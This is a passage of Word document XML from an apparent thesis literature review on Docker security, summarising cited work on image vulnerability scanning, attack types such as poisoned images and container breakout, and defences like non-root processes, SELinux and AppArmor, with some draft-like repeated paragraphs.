      </w:sdt>
      <w:r w:rsidR="00D01577">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0019447E">
        <w:t xml:space="preserve"> A similar </w:t>
      </w:r>
      <w:r w:rsidR="00951EAA">
        <w:t xml:space="preserve">comparative study </w:t>
      </w:r>
      <w:r w:rsidR="00B62D8A">
        <w:t xml:space="preserve">of VM and containers is </w:t>
      </w:r>
      <w:r w:rsidR="004A7F55">
        <w:t xml:space="preserve">carried out in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1625232147"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00D26662">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00D26662">
            <w:instrText xml:space="preserve"> CITATION SMa18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00D26662">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[72]</w:t>
          </w:r>
          <w:r w:rsidR="00D26662">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00362C57">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E039F7A" w14:textId="2C22E614" w:rsidR="00AF1C64" w:rsidRDefault="002632BD" w:rsidP="009048CA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc87032911"/>
      <w:r>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="009048CA">
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nside </w:t>
      </w:r>
      <w:r w:rsidR="009048CA">
        <w:t>Threats</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="51E14935" w14:textId="40438405" w:rsidR="009048CA" w:rsidRDefault="00513FB8" w:rsidP="009048CA">
      <w:r>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00A503A7">
        <w:t xml:space="preserve">system </w:t>
      </w:r>
      <w:r w:rsidR="00F359B6">
        <w:t xml:space="preserve">contains </w:t>
      </w:r>
      <w:r w:rsidR="00056543">
        <w:t>various components</w:t>
      </w:r>
      <w:r w:rsidR="00A54D17">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C08DD">
        <w:t xml:space="preserve">containing images, containers, </w:t>
      </w:r>
      <w:r w:rsidR="00082849">
        <w:t>networks, and volumes.</w:t>
      </w:r>
      <w:r w:rsidR="00F11420">
        <w:t xml:space="preserve"> Hence, </w:t>
      </w:r>
      <w:r w:rsidR="007C12D5">
        <w:t xml:space="preserve">the security aspect of each </w:t>
      </w:r>
      <w:r w:rsidR="00052DB6">
        <w:t xml:space="preserve">component is crucial to </w:t>
      </w:r>
      <w:r w:rsidR="001A102E">
        <w:t xml:space="preserve">provide a safe and secure </w:t>
      </w:r>
      <w:r w:rsidR="00391A82">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00585DBF">
        <w:t>ecosystem.</w:t>
      </w:r>
      <w:r w:rsidR="00FF784E">
        <w:t xml:space="preserve"> The authors in</w:t>
      </w:r>
      <w:r w:rsidR="00073689">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-103575382"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00073689">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00073689">
            <w:instrText xml:space="preserve"> CITATION VJa21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00073689">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[73]</w:t>
          </w:r>
          <w:r w:rsidR="00073689">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00FF784E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00600451">
        <w:t xml:space="preserve">reviewed </w:t>
      </w:r>
      <w:r w:rsidR="0057726D">
        <w:t xml:space="preserve">current Docker security </w:t>
      </w:r>
      <w:r w:rsidR="00132F21">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r w:rsidR="00A54D17">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="005F4ECB">
        <w:t>static analysis approach</w:t>
      </w:r>
      <w:r w:rsidR="00E149BB">
        <w:t xml:space="preserve"> for vulnerabilities, </w:t>
      </w:r>
      <w:r w:rsidR="00C863ED">
        <w:t xml:space="preserve">threats, and tools. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C863ED">
        <w:t>In particular,</w:t>
      </w:r>
      <w:r w:rsidR="00C519FA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D769F">
        <w:t>they</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003D769F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A046B">
        <w:t xml:space="preserve">conducted </w:t>
      </w:r>
      <w:r w:rsidR="00A54D17">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="009A046B">
        <w:t xml:space="preserve">static analysis </w:t>
      </w:r>
      <w:r w:rsidR="00AC6278">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="002C0258">
        <w:t>investigate vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="009907CB">
        <w:t xml:space="preserve">ies </w:t>
      </w:r>
      <w:r w:rsidR="0065057C">
        <w:t xml:space="preserve">on several images </w:t>
      </w:r>
      <w:r w:rsidR="00706E91">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r w:rsidR="00C66694">
        <w:t>free Docker scanning tools</w:t>
      </w:r>
      <w:r w:rsidR="006C23F8">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00724094">
        <w:t xml:space="preserve"> They also </w:t>
      </w:r>
      <w:r w:rsidR="00EA749E">
        <w:t xml:space="preserve">presented </w:t>
      </w:r>
      <w:r w:rsidR="00200DB9">
        <w:t>some</w:t>
      </w:r>
      <w:r w:rsidR="00C246EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00667270">
        <w:t xml:space="preserve">main </w:t>
      </w:r>
      <w:r w:rsidR="00B81C9F">
        <w:t>security threats</w:t>
      </w:r>
      <w:r w:rsidR="007F0CF7">
        <w:t xml:space="preserve"> and attacks</w:t>
      </w:r>
      <w:r w:rsidR="00B81C9F">
        <w:t xml:space="preserve"> in images</w:t>
      </w:r>
      <w:r w:rsidR="00171D4A">
        <w:t xml:space="preserve"> along with their remediation techniques.</w:t>
      </w:r>
      <w:r w:rsidR="00DA55F5">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="00A31A47">
        <w:t xml:space="preserve">main threats </w:t>
      </w:r>
      <w:r w:rsidR="0032265A">
        <w:t>on Docker images include cautious, vulnerable</w:t>
      </w:r>
      <w:r w:rsidR="00213A5D">
        <w:t>, and attack</w:t>
      </w:r>
      <w:r w:rsidR="00DA69C9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00213A5D">
        <w:t>images</w:t>
      </w:r>
      <w:r w:rsidR="00643291">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00532FDA">
        <w:t xml:space="preserve"> However, verifying and scanning Docker image</w:t>
      </w:r>
      <w:r w:rsidR="008A4A89">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00CB5D02">
        <w:t xml:space="preserve"> as well as utilising trusted </w:t>
      </w:r>
      <w:r w:rsidR="00372C2D">
        <w:t>images</w:t>
      </w:r>
      <w:r w:rsidR="008A4A89">
        <w:t xml:space="preserve"> helps to avoid such attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47688595" w14:textId="7A2C2109" w:rsidR="00FE5334" w:rsidRDefault="00A63B0A" w:rsidP="009048CA">
      <w:r>
        <w:t xml:space="preserve">Further, the authors </w:t>
      </w:r>
      <w:r w:rsidR="000A17CF">
        <w:t xml:space="preserve">compared and evaluated </w:t>
      </w:r>
      <w:r w:rsidR="005F7958">
        <w:t xml:space="preserve">various </w:t>
      </w:r>
      <w:r w:rsidR="007E503F">
        <w:t xml:space="preserve">existing </w:t>
      </w:r>
      <w:r w:rsidR="00CD3429">
        <w:t xml:space="preserve">Docker image </w:t>
      </w:r>
      <w:r w:rsidR="009925C3">
        <w:t xml:space="preserve">vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="00CD3429">
        <w:t>tools.</w:t>
      </w:r>
      <w:r w:rsidR="00ED56C6">
        <w:t xml:space="preserve"> They also </w:t>
      </w:r>
      <w:r w:rsidR="006E36DA">
        <w:t>discuss</w:t>
      </w:r>
      <w:r w:rsidR="006051A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00522F5B">
        <w:t xml:space="preserve">the main </w:t>
      </w:r>
      <w:r w:rsidR="001B387E">
        <w:t>issues</w:t>
      </w:r>
      <w:r w:rsidR="00522F5B">
        <w:t xml:space="preserve"> that constitute</w:t>
      </w:r>
      <w:r w:rsidR="00C71C36">
        <w:t xml:space="preserve"> the vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="009843D5">
        <w:t xml:space="preserve"> of images and repositories</w:t>
      </w:r>
      <w:r w:rsidR="00435FD3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00792411">
        <w:t xml:space="preserve"> Any i</w:t>
      </w:r>
      <w:r w:rsidR="006E36DA">
        <w:t xml:space="preserve">mages </w:t>
      </w:r>
      <w:r w:rsidR="00301C38">
        <w:t xml:space="preserve">or repositories </w:t>
      </w:r>
      <w:r w:rsidR="000A6A72">
        <w:t>from untrusted</w:t>
      </w:r>
      <w:r w:rsidR="00B755E4">
        <w:t xml:space="preserve"> sources </w:t>
      </w:r>
      <w:r w:rsidR="005919F5">
        <w:t xml:space="preserve">can be </w:t>
      </w:r>
      <w:r w:rsidR="008F77AF">
        <w:t>susceptible</w:t>
      </w:r>
      <w:r w:rsidR="00515FFC">
        <w:t xml:space="preserve"> or with malicious intent.</w:t>
      </w:r>
      <w:r w:rsidR="00853B53">
        <w:t xml:space="preserve"> The researchers </w:t>
      </w:r>
      <w:r w:rsidR="00EF2705">
        <w:t>insist</w:t>
      </w:r>
      <w:r w:rsidR="00202626">
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r w:rsidR="00EF2705">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E34361">
        <w:t xml:space="preserve">images </w:t>
      </w:r>
      <w:r w:rsidR="001035B7">
        <w:t xml:space="preserve">need to be scanned and verified </w:t>
      </w:r>
      <w:r w:rsidR="00CE149B">
        <w:t>using tools</w:t>
      </w:r>
      <w:r w:rsidR="004020D6">
        <w:t xml:space="preserve"> and conclude that images </w:t>
      </w:r>
      <w:r w:rsidR="00380F27">
        <w:t>must be built</w:t>
      </w:r>
      <w:r w:rsidR="004020D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C5267E">
        <w:t>carefully to avoid</w:t>
      </w:r>
      <w:r w:rsidR="00D43BFB">
        <w:t xml:space="preserve"> significant</w:t>
      </w:r>
      <w:r w:rsidR="00C5267E">
        <w:t xml:space="preserve"> security flaws.</w:t>
      </w:r>
      <w:r w:rsidR="00426671">
        <w:t xml:space="preserve"> This paper </w:t>
      </w:r>
      <w:r w:rsidR="00DD5C74">
        <w:t xml:space="preserve">provided a thorough </w:t>
      </w:r>
      <w:r w:rsidR="00424E1C">
        <w:t xml:space="preserve">vulnerability analysis </w:t>
      </w:r>
      <w:r w:rsidR="002604BA">
        <w:t xml:space="preserve">of Docker images and </w:t>
      </w:r>
      <w:r w:rsidR="00042F8E">
        <w:t>highli</w:t>
      </w:r>
      <w:r w:rsidR="00523870">
        <w:t xml:space="preserve">ghted the </w:t>
      </w:r>
      <w:r w:rsidR="00710567">
        <w:t xml:space="preserve">various security </w:t>
      </w:r>
      <w:r w:rsidR="007954EC">
        <w:t>tools.</w:t>
      </w:r>
      <w:r w:rsidR="006E4A3F">
        <w:t xml:space="preserve"> However, </w:t>
      </w:r>
      <w:r w:rsidR="00B5474B">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="004428B0">
        <w:t xml:space="preserve">paper does not </w:t>
      </w:r>
      <w:r w:rsidR="00F94F23">
        <w:t>provide</w:t>
      </w:r>
      <w:r w:rsidR="00634832">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00F94F23">
        <w:t xml:space="preserve"> practical approach</w:t>
      </w:r>
      <w:r w:rsidR="00E561B9">
        <w:t xml:space="preserve"> to conduct security attacks on Docker systems</w:t>
      </w:r>
      <w:r w:rsidR="00944C56" w:rsidRPr="00944C56">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-2013290145"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00944C56">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00944C56">
            <w:instrText xml:space="preserve"> CITATION VJa21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00944C56">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[73]</w:t>
          </w:r>
          <w:r w:rsidR="00944C56">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00E561B9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00944C56">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050A8E5E" w14:textId="79146920" w:rsidR="00DB0226" w:rsidRDefault="00130B5C" w:rsidP="009048CA">
      <w:r>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="003327BD">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00C33139">
        <w:t>formed</w:t>
      </w:r>
      <w:r w:rsidR="007919EA">
        <w:t xml:space="preserve"> on Linux subsystem features</w:t>
      </w:r>
      <w:r w:rsidR="00DF4B10">
        <w:t xml:space="preserve">, and thus its security </w:t>
      </w:r>
      <w:r w:rsidR="0068114E">
        <w:t xml:space="preserve">aspect covers a wide range </w:t>
      </w:r>
      <w:r w:rsidR="0093181A">
        <w:t>of technolog</w:t>
      </w:r>
      <w:r w:rsidR="003C67E2">
        <w:t>ies.</w:t>
      </w:r>
      <w:r w:rsidR="00135C53">
        <w:t xml:space="preserve"> It uses </w:t>
      </w:r>
      <w:r w:rsidR="00153BCB">
        <w:t>Linux kernel mechanism</w:t>
      </w:r>
      <w:r w:rsidR="008B5153">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="003068DE">
        <w:t>, such as namespaces and Cgroups</w:t>
      </w:r>
      <w:r w:rsidR="000F5F27">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B64B2F">
        <w:t xml:space="preserve"> to provide isolation and resource allocation.</w:t>
      </w:r>
      <w:r w:rsidR="00F437D5">
        <w:t xml:space="preserve"> Consequently, </w:t>
      </w:r>
      <w:r w:rsidR="00757518">
        <w:t xml:space="preserve">its security posture </w:t>
      </w:r>
      <w:r w:rsidR="009B7B47">
        <w:t xml:space="preserve">is heavily reliant on those </w:t>
      </w:r>
      <w:r w:rsidR="00982075">
        <w:t>Linux features.</w:t>
      </w:r>
      <w:r w:rsidR="000E2612">
        <w:t xml:space="preserve"> Yasrib</w:t>
      </w:r>
      <w:r w:rsidR="00982075">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00706859">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="003C4223">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="67" w:name="_Hlk80742567"/>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1233278042"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00394F75">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00394F75">
            <w:instrText xml:space="preserve"> CITATION RYa18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00394F75">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[51]</w:t>
          </w:r>
          <w:r w:rsidR="00394F75">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="67"/>
      <w:r w:rsidR="00574392">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0084052D">
        <w:t xml:space="preserve">presented </w:t>
      </w:r>
      <w:r w:rsidR="003A5173">
        <w:t xml:space="preserve">and reviewed the </w:t>
      </w:r>
      <w:r w:rsidR="00915DE1">
        <w:t xml:space="preserve">potential </w:t>
      </w:r>
      <w:r w:rsidR="003A5173">
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r w:rsidR="007D6629">
        <w:t xml:space="preserve">attacks </w:t>
      </w:r>
      <w:r w:rsidR="00B231D6">
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="00AD5F0F">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00B231D6">
        <w:t xml:space="preserve"> Docker ecosystem</w:t>
      </w:r>
      <w:r w:rsidR="006F4E54">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003910EB">
        <w:t>along with</w:t>
      </w:r>
      <w:r w:rsidR="006F4E54">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00241866">
        <w:t>a brief comparison between VM and containers</w:t>
      </w:r>
      <w:r w:rsidR="00B231D6">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004E5D3F">
        <w:t xml:space="preserve"> This work </w:t>
      </w:r>
      <w:r w:rsidR="002A193B">
        <w:lastRenderedPageBreak/>
        <w:t>details</w:t>
      </w:r>
      <w:r w:rsidR="004E5D3F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00812030">
        <w:t xml:space="preserve">the most </w:t>
      </w:r>
      <w:r w:rsidR="00046CE2">
        <w:t xml:space="preserve">common </w:t>
      </w:r>
      <w:r w:rsidR="002A193B">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00812030">
        <w:t xml:space="preserve">security attacks </w:t>
      </w:r>
      <w:r w:rsidR="002A193B">
        <w:t>along with their rem</w:t>
      </w:r>
      <w:r w:rsidR="007C5A06">
        <w:t>ediation strategies.</w:t>
      </w:r>
      <w:r w:rsidR="00901D53">
        <w:t xml:space="preserve"> The attacks are classified into two main groups</w:t>
      </w:r>
      <w:r w:rsidR="00BF2BD0">
        <w:t>: insider</w:t>
      </w:r>
      <w:r w:rsidR="00404959">
        <w:t xml:space="preserve"> and outsider.</w:t>
      </w:r>
      <w:r w:rsidR="00A513E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00840EA6">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00620BEC">
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidR="00A513E3">
        <w:t xml:space="preserve">insider security vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="00546701">
        <w:t xml:space="preserve">can be avoided </w:t>
      </w:r>
      <w:r w:rsidR="00620BEC">
        <w:t xml:space="preserve">through </w:t>
      </w:r>
      <w:r w:rsidR="00E42062">
        <w:t xml:space="preserve">some configuration </w:t>
      </w:r>
      <w:r w:rsidR="004036A7">
        <w:t>on Docker, such as enabling -selinux flag.</w:t>
      </w:r>
      <w:r w:rsidR="00C75854">
        <w:t xml:space="preserve"> On the other hand, outside attacks </w:t>
      </w:r>
      <w:r w:rsidR="00495ABB">
        <w:t xml:space="preserve">can be prevented </w:t>
      </w:r>
      <w:r w:rsidR="000A06D3">
        <w:t>by</w:t>
      </w:r>
      <w:r w:rsidR="00495ABB">
        <w:t xml:space="preserve"> disabling or removing </w:t>
      </w:r>
      <w:r w:rsidR="001F70BE">
        <w:t xml:space="preserve">some capabilities </w:t>
      </w:r>
      <w:r w:rsidR="00C16559">
        <w:t>features on containers.</w:t>
      </w:r>
      <w:r w:rsidR="00D029C5">
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidR="008F4907">
        <w:t>ome</w:t>
      </w:r>
      <w:r w:rsidR="009A23F7">
        <w:t xml:space="preserve"> of the </w:t>
      </w:r>
      <w:r w:rsidR="00EB2AF7">
        <w:t>attacks include</w:t>
      </w:r>
      <w:r w:rsidR="000A3EEC">
        <w:t xml:space="preserve"> poisoned images, ARP poisoning, MitM</w:t>
      </w:r>
      <w:r w:rsidR="00631CF0">
        <w:t>, Dos</w:t>
      </w:r>
      <w:r w:rsidR="007C38EC">
        <w:t>, secret compromised, and container breakout.</w:t>
      </w:r>
      <w:r w:rsidR="00B86E61">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F9D6A6" w14:textId="365C1207" w:rsidR="00677D92" w:rsidRDefault="005215CE" w:rsidP="009048CA">
      <w:r>
        <w:t xml:space="preserve">Further, the </w:t>
      </w:r>
      <w:r w:rsidR="00D813E1">
        <w:t xml:space="preserve">author offers remediation </w:t>
      </w:r>
      <w:r w:rsidR="0029409C">
        <w:t xml:space="preserve">techniques </w:t>
      </w:r>
      <w:r w:rsidR="006E61F6">
        <w:t xml:space="preserve">to prevent these security </w:t>
      </w:r>
      <w:r w:rsidR="00EC1EFA">
        <w:t>threats and</w:t>
      </w:r>
      <w:r w:rsidR="00141B7A">
        <w:t xml:space="preserve"> recommends</w:t>
      </w:r>
      <w:r w:rsidR="002C0571">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE2FE8">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="002C0571">
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidR="00141B7A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C0571">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00463359">
        <w:t xml:space="preserve">users to run a process under non-root privilege when it is running inside a container to avoid privilege </w:t>
      </w:r>
      <w:r w:rsidR="003B0727">
        <w:t>and Dos attacks</w:t>
      </w:r>
      <w:r w:rsidR="00DE2FE8">
        <w:t>-a</w:t>
      </w:r>
      <w:r w:rsidR="00D14AB3">
        <w:t xml:space="preserve">nd also enabling </w:t>
      </w:r>
      <w:r w:rsidR="00681E83">
        <w:t>Linux kernel features, such as SELinux and AppArmor</w:t>
      </w:r>
      <w:r w:rsidR="00145FBD">
        <w:t>, to provide additional security for Docker environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AEE0DB" w14:textId="28C8949B" w:rsidR="00D029C5" w:rsidRDefault="001A1E40" w:rsidP="009048CA">
      <w:r>
        <w:t xml:space="preserve">This work </w:t>
      </w:r>
      <w:r w:rsidR="00A9694A">
        <w:t xml:space="preserve">insists to run a process under non-root privilege when it is running </w:t>
      </w:r>
      <w:r w:rsidR="00EF2FEE">
        <w:t>inside a container and</w:t>
      </w:r>
      <w:r w:rsidR="009C54D6">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00EF2FEE">
        <w:t>enable</w:t>
      </w:r>
      <w:r w:rsidR="009C54D6">
        <w:t xml:space="preserve"> Linux kernel features, such as SELinux </w:t>
      </w:r>
      <w:r w:rsidR="007D03DE">
        <w:t>and AppArmor.</w:t>
      </w:r>
      <w:r w:rsidR="00EF2FEE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B3946">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C49EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E78A4CA" w14:textId="53E93BFB" w:rsidR="00552087" w:rsidRPr="009048CA" w:rsidRDefault="008A1E85" w:rsidP="009048CA">
      <w:r>
        <w:t xml:space="preserve">It also covers a brief comparison </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFAC4B9" w14:textId="57A20222" w:rsidR="00781901" w:rsidRDefault="005215CE" w:rsidP="009048CA">
      <w:r>
        <w:t xml:space="preserve">Further, the </w:t>
      </w:r>
      <w:r w:rsidR="00D813E1">
        <w:t>author</w:t>
      </w:r>
      <w:r w:rsidR="002911B6">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1039585657"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="002911B6">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="002911B6">
            <w:instrText xml:space="preserve"> CITATION RYa18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="002911B6">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[51]</w:t>
          </w:r>
          <w:r w:rsidR="002911B6">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="002911B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D813E1">
        <w:t xml:space="preserve">offers remediation </w:t>
      </w:r>
      <w:r w:rsidR="0029409C">
        <w:t xml:space="preserve">techniques </w:t>
      </w:r>
      <w:r w:rsidR="006E61F6">
        <w:t xml:space="preserve">to prevent these security </w:t>
      </w:r>
      <w:r w:rsidR="00EC1EFA">
        <w:t>threats and</w:t>
      </w:r>
      <w:r w:rsidR="00141B7A">
        <w:t xml:space="preserve"> recommends</w:t>
      </w:r>
      <w:r w:rsidR="002C0571">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE2FE8">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="002C0571">
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidR="00141B7A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C0571">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00463359">
        <w:t xml:space="preserve">users to run a process under non-root privilege when it is running inside a container to avoid privilege </w:t>
      </w:r>
      <w:r w:rsidR="003B0727">
        <w:t>and Dos attacks</w:t>
      </w:r>
      <w:r w:rsidR="00DE2FE8">
        <w:t>-a</w:t>
      </w:r>
      <w:r w:rsidR="00D14AB3">
        <w:t xml:space="preserve">nd also enabling </w:t>
      </w:r>
      <w:r w:rsidR="00681E83">
        <w:t>Linux kernel features, such as SELinux and AppArmor</w:t>
      </w:r>
      <w:r w:rsidR="00145FBD">
        <w:t>, to provide additional security for Docker environment.</w:t>
      </w:r>
      <w:r w:rsidR="002E3032">
        <w:t xml:space="preserve"> Lastly, the author propose</w:t>
      </w:r>
      <w:r w:rsidR="00176EAC">
        <w:t xml:space="preserve">d implementing </w:t>
      </w:r>
      <w:r w:rsidR="00781901">
        <w:t xml:space="preserve">access control policies </w:t>
      </w:r>
      <w:r w:rsidR="002911B6">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r w:rsidR="00781901">
        <w:t xml:space="preserve">SELinux modules </w:t>
      </w:r>
      <w:r w:rsidR="002911B6">
        <w:t>and guidelines to a secure deployment process to ensure a safe and secure Docker environment. This article is well documented and provides detailed</w:t>
      </w:r>
      <w:r w:rsidR="00407E0D">
        <w:t xml:space="preserve"> research of various Docker security challenges</w:t>
      </w:r>
      <w:r w:rsidR="00E85971">
        <w:t>, though it contains less reference count</w:t>
      </w:r>
      <w:r w:rsidR="00407E0D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E85971">
        <w:t xml:space="preserve"> I</w:t>
      </w:r>
      <w:r w:rsidR="00407E0D">
        <w:t xml:space="preserve">t </w:t>
      </w:r>
      <w:r w:rsidR="00E85971">
        <w:t>also lacks practical or experimental approach to demonstrate attacks</w:t>
      </w:r>
      <w:r w:rsidR="00416917" w:rsidRPr="00416917">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1667625125"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00416917">
            <w:fldChar w:fldCharType="begin"/>
